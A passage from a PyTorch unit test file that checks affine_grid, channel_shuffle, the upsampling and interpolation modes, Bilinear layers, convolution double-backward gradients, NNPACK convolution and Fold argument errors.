[[[[[1., -1., -3.], [2., 4., 6.]], [[3., 5., 7.], [4., 10., 16.]]],
[[[4., 6., 8.], [5., 11., 17.]], [[6., 12., 18.], [7., 17., 27.]]]]]).view(1, 2, 2, 2, 3)
self.assertEqual(output, groundtruth)
for align_corners in (True, False):
# do gradcheck
N = random.randint(1, 8)
C = random.randint(1, 8)
D = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, D, H, W])
inp = torch.randn(N, 3, 4, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
self.assertTrue(gradcheck(
lambda inp: F.affine_grid(inp, sz, align_corners=align_corners),
(inp,)))
# test CPU against CUDA
if TEST_CUDA:
N = random.randint(1, 8)
C = random.randint(1, 8)
D = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, D, H, W])
for align_corners in (True, False):
input_cpu = torch.randn(N, 3, 4, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
out_cpu = F.affine_grid(input_cpu, sz, align_corners=align_corners)
gradients = torch.randn(out_cpu.size())
out_cpu.backward(gradients)
input_gpu = input_cpu.detach().cuda().requires_grad_()
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
out_cuda = F.affine_grid(input_gpu, sz, align_corners=align_corners)
out_cuda.backward(gradients.cuda())
self.assertEqual(out_cpu, out_cuda)
self.assertEqual(input_cpu.grad, input_gpu.grad)
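# A minimal sketch (not part of the original tests) tying affine_grid to
# grid_sample: an identity theta reproduces the input when sampled.
# theta = torch.tensor([[[1., 0., 0.], [0., 1., 0.]]]) # identity affine
# grid = F.affine_grid(theta, torch.Size([1, 1, 2, 2]), align_corners=True)
# F.grid_sample(img, grid, align_corners=True) # == img for any 1x1x2x2 img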
def test_channel_shuffle(self):
# 3D tensor
x = torch.tensor(
[[[1, 2],
[5, 6],
[9, 10],
[13, 14],
]]
)
y_ref = torch.tensor(
[[[1, 2],
[9, 10],
[5, 6],
[13, 14],
]]
)
# ChannelsFirst
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# channels_last is not supported for 3-dim tensors
# 4D tensor
x = torch.tensor(
[[[[1, 2],
[3, 4]],
[[5, 6],
[7, 8]],
[[9, 10],
[11, 12]],
[[13, 14],
[15, 16]],
]]
)
y_ref = torch.tensor(
[[[[1, 2],
[3, 4]],
[[9, 10],
[11, 12]],
[[5, 6],
[7, 8]],
[[13, 14],
[15, 16]],
]]
)
# ChannelsFirst NCHW
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# ChannelsLast NHWC
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x.contiguous(memory_format=torch.channels_last), 2)
self.assertEqual(len(w), 0)
y = y.contiguous(memory_format=torch.contiguous_format)
self.assertEqual(y, y_ref)
# 5D tensor
x = torch.tensor(
[[[[[1, 2],
[3, 4]]],
[[[5, 6],
[7, 8]]],
[[[9, 10],
[11, 12]]],
[[[13, 14],
[15, 16]]],
]]
)
y_ref = torch.tensor(
[[[[[1, 2],
[3, 4]]],
[[[9, 10],
[11, 12]]],
[[[5, 6],
[7, 8]]],
[[[13, 14],
[15, 16]]],
]]
)
# ChannelsFirst NCDHW
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# ChannelsLast NDHWC
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x.contiguous(memory_format=torch.channels_last_3d), 2)
self.assertEqual(len(w), 0)
y = y.contiguous(memory_format=torch.contiguous_format)
self.assertEqual(y, y_ref)
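# channel_shuffle(x, g) is equivalent to splitting the channel dim into
# (g, C // g), transposing, and flattening back; a hedged sketch for 4D:
# n, c, h, w = x.shape
# y = x.view(n, g, c // g, h, w).transpose(1, 2).reshape(n, c, h, w)
# which matches F.channel_shuffle(x, g) element-wise in the cases above.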
def test_upsamplingNearest1d(self):
m = nn.Upsample(size=4, mode='nearest')
in_t = torch.ones(1, 1, 2)
in_uint8_t = torch.ones(1, 1, 2, dtype=torch.uint8)
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
out_uint8_t = m(in_uint8_t)
self.assertEqual(torch.ones(1, 1, 4), out_t.data)
self.assertEqual(torch.ones(1, 1, 4, dtype=torch.uint8), out_uint8_t.data)
input = torch.randn(1, 1, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
def test_upsamplingLinear1d(self):
for align_corners in [True, False]:
kwargs = dict(mode='linear', align_corners=align_corners)
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
m = nn.Upsample(scale_factor=scale_factor, **kwargs)
in_t = torch.ones(1, 1, 2)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
self.assertEqual(torch.ones(1, 1, out_size), out_t.data)
input = torch.randn(1, 1, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), (input,))
def test_upsamplingLinear1d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='linear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9)
in_t_9[:, :, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5])
self.assertEqual(out_t_9[:, :, :15], out_t_5)
def test_upsamplingBicubic2d(self):
# test output against known input: the align_corners=False result must match OpenCV
in_t = torch.arange(8.).view(1, 2, 2, 2)
expected_out_t = torch.tensor(
[[[[-0.31641, 0.01562, 0.56250, 0.89453],
[0.34766, 0.67969, 1.22656, 1.55859],
[1.44141, 1.77344, 2.32031, 2.65234],
[2.10547, 2.43750, 2.98438, 3.31641]],
[[3.68359, 4.01562, 4.56250, 4.89453],
[4.34766, 4.67969, 5.22656, 5.55859],
[5.44141, 5.77344, 6.32031, 6.65234],
[6.10547, 6.43750, 6.98438, 7.31641]]]])
out_t = F.interpolate(in_t, scale_factor=2, mode='bicubic', align_corners=False)
torch.set_printoptions(precision=5)
self.assertEqual(out_t, expected_out_t, atol=1e-5, rtol=0)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for align_corners in [True, False]:
kwargs = dict(mode='bicubic', align_corners=align_corners)
# test float scale factor up & downsampling
for device in device_list:
for scale_factor in [0.5, 1, 1.5, 2]:
in_t = torch.ones(2, 2, 2, 2).to(device)
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
self.assertEqual(torch.ones(2, 2, out_size, out_size), out_t.data,
atol=1e-5, rtol=0)
input = torch.randn(2, 2, 2, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsampling_not_recompute_scale_factor(self):
# test output against known input: result must match OpenCV
in_t = torch.arange(8.).view(1, 2, 2, 2)
expected_out_t = torch.tensor(
[[[[-0.32725, -0.08843, 0.37933, 0.79744],
[0.15039, 0.38921, 0.85697, 1.27508],
[1.08591, 1.32473, 1.79249, 2.21060],
[1.92213, 2.16095, 2.62871, 3.04682]],
[[3.67275, 3.91157, 4.37933, 4.79744],
[4.15039, 4.38921, 4.85697, 5.27508],
[5.08591, 5.32473, 5.79249, 6.21060],
[5.92213, 6.16095, 6.62871, 7.04682]]]])
if IS_PPC:
# Both OpenCV and PyTorch give a slightly different result on PPC
expected_out_t = torch.tensor(
[[[[-0.32725, -0.08843, 0.37933, 0.79744],
[0.15039, 0.38921, 0.85697, 1.27508],
[1.08591, 1.32473, 1.79249, 2.21060],
[1.92212, 2.16094, 2.62870, 3.04681]],
[[3.67275, 3.91157, 4.37933, 4.79743],
[4.15039, 4.38921, 4.85697, 5.27508],
[5.08591, 5.32473, 5.79249, 6.21059],
[5.92212, 6.16094, 6.62870, 7.04680]]]])
out_t = F.interpolate(in_t, scale_factor=2.3, mode='bicubic', align_corners=False, recompute_scale_factor=False)
torch.set_printoptions(precision=5)
self.assertEqual(out_t, expected_out_t, atol=1e-4, rtol=0)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for align_corners in [True, False]:
kwargs = dict(mode='bicubic', align_corners=align_corners)
# test float scale factor up & downsampling
for device in device_list:
for scale_factor in [0.6, 1.6, 2.3]:
in_t = torch.ones(2, 2, 2, 2).to(device)
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
self.assertEqual(torch.ones(2, 2, out_size, out_size), out_t.data, atol=1e-5, rtol=0)
input = torch.randn(2, 2, 2, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsamplingBilinear2d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='bilinear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9, 9)
in_t_9[:, :, :4, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5, :5])
self.assertEqual(out_t_9[:, :, :15, :15], out_t_5)
def test_upsamplingNearest3d(self):
for memory_format in [torch.contiguous_format, torch.channels_last_3d]:
m = nn.Upsample(size=4, mode='nearest')
in_t = torch.ones(1, 2, 2, 2, 2).contiguous(memory_format=memory_format)
in_uint8_t = torch.ones(1, 2, 2, 2, 2, dtype=torch.uint8).contiguous(memory_format=memory_format)
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
out_uint8_t = m(in_uint8_t)
self.assertEqual(torch.ones(1, 2, 4, 4, 4), out_t)
self.assertEqual(torch.ones(1, 2, 4, 4, 4, dtype=torch.uint8), out_uint8_t)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, 2, requires_grad=True).contiguous(memory_format=memory_format)
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
# Assert that cpu and cuda handle channels_last memory format in the same way
# https://github.com/pytorch/pytorch/issues/54590
if torch.cuda.is_available():
a = torch.ones(2, 2, 2, 3, 4, requires_grad=True).contiguous(memory_format=torch.channels_last_3d)
# make the data asymmetric; ensure that cuda/cpu handle channels_last appropriately.
a[1][1][1][2][2] = a[1][1][1][2][3] = 0
out_cpu = torch.nn.functional.interpolate(a, scale_factor=2, mode='nearest')
out_cuda = torch.nn.functional.interpolate(a.to('cuda'), scale_factor=2, mode='nearest')
self.assertEqual(out_cpu, out_cuda.to('cpu'))
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a])
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a.to('cuda')])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a.to('cuda')])
def test_upsamplingTrilinear3d(self):
for align_corners in [True, False]:
kwargs = dict(mode='trilinear', align_corners=align_corners)
for memory_format in [torch.contiguous_format, torch.channels_last_3d]:
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
m = nn.Upsample(scale_factor=scale_factor, **kwargs)
in_t = torch.ones(1, 2, 2, 2, 2).contiguous(memory_format=memory_format)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
self.assertEqual(torch.ones(1, 2, out_size, out_size, out_size), out_t.data)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, 2, requires_grad=True)
self.assertEqual(
F.interpolate(input, (out_size, out_size, out_size), **kwargs),
F.interpolate(input, scale_factor=scale_factor, **kwargs))
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
gradgradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsamplingTrilinear3d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='trilinear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9, 9, 9)
in_t_9[:, :, :4, :4, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5, :5, :5])
self.assertEqual(out_t_9[:, :, :15, :15, :15], out_t_5)
def test_upsampling_small_scale(self):
m = torch.nn.Upsample(scale_factor=0.5, mode="bilinear")
in_t = torch.arange(1, 5, dtype=torch.float64).reshape(1, 1, 2, 2)
out_t = m(in_t)
expected_out_t = torch.tensor([[[[2.5]]]])
self.assertEqual(expected_out_t, out_t)
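# The expected output length throughout these upsampling tests is
# out_size = floor(in_size * scale_factor); here in_size=2 and
# scale_factor=0.5 give out_size=1, hence the single 2.5 asserted above,
# the average of [[1, 2], [3, 4]].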
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_interpolate_illegal_memory_access(self):
in_s = 45
out_s = 14
input = torch.ones((1, 1, in_s), device='cuda', requires_grad=True)
# note: grad_output is allocated larger than needed so that out-of-bounds
# accesses would be visible in grad_input
grad = torch.ones((1, 1, out_s * 2), device='cuda', requires_grad=True)
grad = grad[:, :, :out_s]
input_ref = input.detach().cpu().requires_grad_()
grad_ref = grad.cpu()
out = F.interpolate(input, size=(out_s,), mode='nearest')
out.backward(grad)
out_ref = F.interpolate(input_ref, size=(out_s,), mode='nearest')
out_ref.backward(grad_ref)
self.assertEqual(out_ref, out)
self.assertEqual(input_ref.grad, input.grad)
def test_interpolate(self):
def _test_interpolate_helper(in_t, scale_factor, layer):
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
dim = len(in_t.shape) - 2
out_shape = [1, 1] + [out_size] * dim
with warnings.catch_warnings(record=True) as w:
out_t = layer(in_t)
self.assertEqual(torch.ones(out_shape), out_t)
self.assertEqual(
F.interpolate(in_t, (out_size,) * dim, **kwargs),
F.interpolate(in_t, scale_factor=scale_factor, **kwargs))
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [in_t], nondet_tol=GRADCHECK_NONDET_TOL)
gradgradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [in_t], nondet_tol=GRADCHECK_NONDET_TOL)
def _make_input(dim, device):
size = [1, 1]
size += [2] * dim
return torch.ones(size, requires_grad=True, device=device)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
for scale_factor in [0.5, 1.5, 2]:
for mode in ['nearest', 'area']:
kwargs = dict(mode=mode)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
for input in [_make_input(1, device), _make_input(2, device), _make_input(3, device)]:
_test_interpolate_helper(input, scale_factor, m)
for align_corners in [True, False]:
kwargs = dict(mode='linear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(1, device), scale_factor, m)
kwargs = dict(mode='bilinear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(2, device), scale_factor, m)
kwargs = dict(mode='bicubic', align_corners=align_corners)
def m(t):
return F.interpolate(t, scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(2, device), scale_factor, m)
kwargs = dict(mode='trilinear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(3, device), scale_factor, m)
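# A summary of the mode/dimensionality pairing exercised above: 'nearest' and
# 'area' accept 3D/4D/5D inputs, while 'linear', 'bilinear', 'bicubic' and
# 'trilinear' are specific to 3D, 4D, 4D and 5D inputs respectively.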
def test_linear_broadcasting(self):
m = nn.Linear(5, 8)
inp = torch.randn(2, 3, 5)
expected = m(inp.view(6, 5)).view(2, 3, 8)
self.assertEqual(expected, m(inp))
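# nn.Linear applies only to the last dimension, so an (N, *, in_features)
# input maps to (N, *, out_features); the view-based reference above checks
# exactly that: (2, 3, 5) -> (2, 3, 8) for Linear(5, 8).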
def test_bilinear(self):
module = nn.Bilinear(10, 10, 8)
input1 = torch.randn(4, 10, requires_grad=True)
input2 = torch.randn(4, 10, requires_grad=True)
grad_output = torch.randn(4, 8)
res = module(input1, input2)
expected = (torch.einsum("bi,kij,bj->bk", input1, module.weight, input2) +
module.bias)
self.assertEqual(res, expected)
grads = torch.autograd.grad(res, [module.weight, module.bias, input1, input2], grad_output)
grads_expected = torch.autograd.grad(expected, [module.weight, module.bias, input1, input2], grad_output)
for g, ge in zip(grads, grads_expected):
self.assertEqual(g, ge)
def test_bilinear_non_contiguous(self):
module = nn.Bilinear(7, 7, 5)
input1 = torch.randn(4, 7, 10, requires_grad=True)
input2 = torch.randn(4, 7, 10, requires_grad=True)
input1_tp = input1.transpose(1, 2)
input2_tp = input2.transpose(1, 2)
grad_output = torch.randn(4, 10, 5)
def run(input1_tp, input2_tp):
input1.grad = input2.grad = None
output = module(input1_tp, input2_tp)
output.backward(grad_output)
return output.data, input1.grad.data, input2.grad.data
out_nc, g1_nc, g2_nc = run(input1_tp, input2_tp)
input1_tp = input1_tp.contiguous()
input2_tp = input2_tp.contiguous()
out, g1, g2 = run(input1_tp, input2_tp)
self.assertEqual(out, out_nc)
self.assertEqual(g1, g1_nc)
self.assertEqual(g2, g2_nc)
def test_bilinear_no_bias(self):
module = nn.Bilinear(10, 10, 8)
module_no_bias = nn.Bilinear(10, 10, 8, False)
module.bias.data.zero_()
module.weight.data.copy_(module_no_bias.weight)
input1 = torch.randn(4, 10, requires_grad=True)
input2 = torch.randn(4, 10, requires_grad=True)
grad_output = torch.randn(4, 8)
def run(net):
input1.grad = input2.grad = None
output = net(input1, input2)
output.backward(grad_output)
return output.data, input1.grad.data, input2.grad.data
out, g1, g2 = run(module)
out_nb, g1_nb, g2_nb = run(module_no_bias)
self.assertEqual(out, out_nb)
self.assertEqual(g1, g1_nb)
self.assertEqual(g2, g2_nb)
_assertGradAndGradgradChecks(self,
lambda x1, x2: F.bilinear(x1, x2, module_no_bias.weight, module_no_bias.bias),
(input1, input2))
def test_bilinear_broadcasting(self):
m = nn.Bilinear(5, 6, 8)
input1 = torch.randn(2, 3, 5)
input2 = torch.randn(2, 3, 6)
expected = m(input1.view(6, 5), input2.view(6, 6)).view(2, 3, 8)
self.assertEqual(expected, m(input1, input2))
def test_conv_tbc(self):
inp = torch.randn(9, 4, 5, requires_grad=True)
weight = torch.randn(3, 5, 6, requires_grad=True)
bias = torch.randn(6, requires_grad=True)
gradcheck(lambda i, w, b, pad: F.conv_tbc(i, w, b, pad), (inp, weight, bias, 3))
def run_conv_double_back_test(self, kern, stride, padding, chan_in, chan_out, batch_size,
inp_size, dilation, no_weight, groups=1, use_cuda=False,
use_bias=True, dtype=torch.double):
if use_cuda:
device = torch.device("cuda")
else:
device = torch.device("cpu")
x = torch.randn(batch_size, chan_in, inp_size, inp_size, device=device,
dtype=dtype, requires_grad=True)
weight = torch.randn(chan_out, chan_in // groups, kern, kern, device=device,
dtype=dtype, requires_grad=not no_weight)
if use_bias:
bias = torch.randn(chan_out, device=device, dtype=dtype, requires_grad=True)
else:
bias = None
def func(*inputs):
if use_bias:
lx, lweight, lbias = inputs
else:
lx, lweight = inputs
lbias = None
# We disable cudnn during forward to avoid finite difference imprecision issues
with cudnn.flags(enabled=False):
out = F.conv2d(lx, lweight, lbias, stride, padding, dilation, groups)
return out
if use_bias:
inputs = x, weight, bias
else:
inputs = x, weight
dummy_out = func(*inputs)
grad_y = torch.randn_like(dummy_out, device=device, dtype=dtype, requires_grad=True)
# Issue #15353: test mkldnn double backward, don't run gradgradcheck due
# to imprecision issues
if dtype == torch.float:
g, = torch.autograd.grad(dummy_out.sum(), x, create_graph=True)
return g.requires_grad
return gradgradcheck(func, inputs, (grad_y,))
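# Note: for float dtypes the helper above only checks that a double-backward
# graph can be built (g.requires_grad), while for double it runs a full
# numerical gradgradcheck; see the mkldnn note above for why.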
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
@skipIfRocmVersionLessThan((4, 3))
@skipIfNotMiopenSuggestNHWC
def test_grouped_conv_cudnn_nhwc_support(self):
# catch holes in grouped-convolution NHWC support on earlier cuDNN versions
input = torch.randn((16, 16, 8, 8), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
weight = torch.randn((8, 4, 3, 3), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
out = torch.convolution(input, weight, None, (1, 1), (1, 1), (1, 1), False, (0, 0), 4)
input = torch.randn((16, 8, 8, 8), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
out_transpose = torch.convolution(input, weight, None, (1, 1), (1, 1), (1, 1), True, (0, 0), 4)
@unittest.expectedFailure
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_conv_cudnn_memory_layout_dominance(self):
# The desired behavior is for the memory format of conv.weight to dominate
# the memory format of the output. This is not the current behavior; it will
# be fixed in follow-up PRs, at which point the `expectedFailure` tag can be
# removed.
input = torch.randint(1, 10, (2, 8, 4, 4), dtype=torch.float32, device="cuda", requires_grad=True)
conv = nn.Conv2d(8, 4, 3).cuda().float()
out = conv(input)
self.assertTrue(out.is_contiguous())
input = input.contiguous(memory_format=torch.channels_last)
out = conv(input)
self.assertTrue(out.is_contiguous())
conv.weight.data = conv.weight.contiguous(memory_format=torch.channels_last)
out = conv(input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
input = input.contiguous()
out = conv(input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
def test_conv_double_backward(self):
batch_size = 2
for kern, inp_size, dilations in [(3, 6, [1, 2]), (3, 7, [1]), (4, 9, [1])]:
for stride, padding, chan_in, chan_out, dilation in \
product([1, 2], [0, 1, 2], [2], [3], dilations):
for no_weight in (True, False):
for dtype in (torch.float, torch.double):
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, dtype=dtype)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation) +
"\ndtype: " + str(dtype))
def test_conv_double_backward_no_bias(self):
kern = 3
stride = 2
chan_in, chan_out = 2, 4
batch_size = 2
inp_size = 5
padding = 1
dilation = 1
no_weight = False
use_bias = True
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, use_bias=use_bias)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation))
def test_conv_double_backward_groups(self):
kern = 3
stride = 1
padding = 2
chan_in, chan_out = 2, 4
batch_size = 2
inp_size = 6
dilation = 1
no_weight = False
groups = 2
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in * groups, chan_out * groups,
batch_size, inp_size, dilation,
no_weight, groups=groups)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation) +
"\ngroups: " + str(groups))
def test_conv_double_backward_stride(self):
batch_size = 2
# Cannot provide ggW when stride is > 1
for kern, inp_size, dilations in [(3, 5, [1, 2]), (3, 7, [1])]:
for stride, padding, chan_in, chan_out, dilation in product([2], [0, 1], [1], [2], dilations):
no_weight = False
self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_cudnn_noncontiguous_weight(self):
# Noncontiguous weights must be contiguous() before being
# passed to cuDNN
input = torch.tensor([1, 1, 1], dtype=torch.double, device="cuda").view(1, 1, 3)
weights1 = torch.tensor([1], dtype=torch.double, device="cuda").expand(1, 1, 2)
weights2 = torch.tensor([1], dtype=torch.double, device="cuda").expand(1, 1, 2).contiguous()
self.assertEqual(F.conv1d(input, weights1, bias=None, stride=2, dilation=2),
F.conv1d(input, weights2, bias=None, stride=2, dilation=2))
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@repeat_test_for_types(DOUBLE_TENSORTYPES)
def test_conv_double_backward_cuda(self, dtype=torch.double):
# Double backward only runs with DoubleTensor for precision reasons
batch_size = 1
for kern, inp_size, dilations in [(3, 5, [1, 2]), (4, 9, [1])]:
for stride, padding, chan_in, chan_out, dilation in product([1], [2], [2], [3], dilations):
no_weight = stride == 2
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, use_cuda=True, dtype=dtype)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation))
def run_grad_conv_test(self, func_forward, func_backward, dim=1, gradient='input'):
for kern, inp_size in [(3, 6), (3, 7), (4, 9)]:
for batch, stride, padding, chan_in, chan_out, dilation in \
product([1, 2], [1, 2], [0, 1, 2], [2], [3], [1]):
for has_bias in [True, False]:
input_shape = [batch, chan_in]
weight_shape = [chan_out, chan_in]
for _ in range(dim):
input_shape.append(inp_size)
weight_shape.append(kern)
input = torch.randn(input_shape, requires_grad=True)
weight = torch.randn(weight_shape, requires_grad=True)
if has_bias:
bias = torch.randn([chan_out], requires_grad=True)
else:
bias = None
output = func_forward(input, weight, stride=stride, padding=padding, dilation=dilation, bias=bias)
gradient_o = torch.randn(output.shape)
gradient_w = torch.autograd.grad(output, input if (gradient == 'input') else weight, gradient_o)
self.assertEqual(gradient_w[0],
func_backward(
input_shape if (gradient == 'input') else input,
weight_shape if (gradient == 'weight') else weight,
gradient_o,
stride=stride,
padding=padding,
dilation=dilation))
def test_grad_conv1d_input(self):
self.run_grad_conv_test(F.conv1d, F.grad.conv1d_input, 1, 'input')
def test_grad_conv1d_weight(self):
self.run_grad_conv_test(F.conv1d, F.grad.conv1d_weight, 1, 'weight')
def test_grad_conv2d_input(self):
self.run_grad_conv_test(F.conv2d, F.grad.conv2d_input, 2, 'input')
def test_grad_conv2d_weight(self):
self.run_grad_conv_test(F.conv2d, F.grad.conv2d_weight, 2, 'weight')
def test_grad_conv3d_input(self):
self.run_grad_conv_test(F.conv3d, F.grad.conv3d_input, 3, 'input')
def test_grad_conv3d_weight(self):
self.run_grad_conv_test(F.conv3d, F.grad.conv3d_weight, 3, 'weight')
@unittest.skipIf(not torch._nnpack_available(), "NNPACK unavailable")
def test_nnpack_conv(self):
for kern, inp_size in [(3, 6), (3, 7), (4, 9)]:
for batch, stride, padding, chan_in, chan_out in \
product([1, 2, 3, 4], [1, 2], [0, 1, 2], [2], [3]):
for has_bias in [True, False]:
input_shape = [batch, chan_in]
weight_shape = [chan_out, chan_in]
for _ in range(2):
input_shape.append(inp_size)
weight_shape.append(kern)
input = torch.randn(input_shape, requires_grad=True, dtype=torch.float)
weight = torch.randn(weight_shape, requires_grad=True, dtype=torch.float)
if has_bias:
bias = torch.randn([chan_out], requires_grad=True, dtype=torch.float)
else:
bias = None
output = torch._nnpack_spatial_convolution(input, weight, stride=stride, padding=padding, bias=bias)
output_expected = torch.nn.functional.conv2d(input, weight, stride=stride, padding=padding, bias=bias)
self.assertEqual(output, output_expected, atol=3e-4, rtol=0)
gradient_o = torch.randn(output.shape, dtype=torch.float)
grads = torch.autograd.grad(output, [input, weight], gradient_o)
grads_expected = torch.autograd.grad(output_expected, [input, weight], gradient_o)
for gr, gr_expected in zip(grads, grads_expected):
self.assertEqual(gr, gr_expected, atol=3e-4, rtol=0)
def test_fold_invalid_arg(self):
# input wrong dimension
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
with self.assertRaisesRegex(NotImplementedError, r"Only 3D input Tensors are supported"):
fold(torch.randn(1, 5))
# input.size(1) not divisible by prod(kernel_size)
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
with self.assertRaisesRegex(RuntimeError, r"be divisible by the product of kernel_size"):
fold(torch.randn(1, 5, 9))
with self.assertRaisesRegex(RuntimeError, r"be divisible by the product of kernel_size"):
fold(torch.randn(1, 19, 9))
# input.size(2) not matching the total number of sliding blocks
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
fold(torch.randn(1, 6, 10))
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3), stride=(2, 2))
fold(torch.randn(1, 6, 5))
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3), stride=(2, 2), dilation=(1, 2), padding=(2, 0))
